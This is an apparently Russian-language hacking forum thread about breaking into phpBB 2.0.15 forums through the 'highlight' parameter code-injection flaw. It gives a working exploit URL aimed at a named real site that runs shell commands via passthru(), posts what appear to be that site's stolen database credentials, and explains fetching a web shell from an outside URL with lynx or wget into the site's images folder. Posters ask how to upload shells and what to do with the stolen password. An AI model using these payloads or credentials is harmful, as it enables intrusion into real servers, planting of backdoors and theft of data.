На некоторых форумах выдаётся вот такая штука!!!
Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498

Чё это такое?

http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ???

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'blend129_form';
$dbuser = 'blend129_form';
$dbpasswd = '109033';

Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).')
можно залить файлы на сервак ?

Ну есть масса способов..
можешь через exec() залить..
но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).

Rebz, приведи для начинающих пример этой команды плизз

Я немного не в ту степь пошёл.. =)
Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
Синаксис такой:

lynx -source http://здесь_урл_шелла/shell.php>>1.php
после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
Ну и т.д. по аналогии...

как его открыть подробнее пожалуйста напиши.

Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)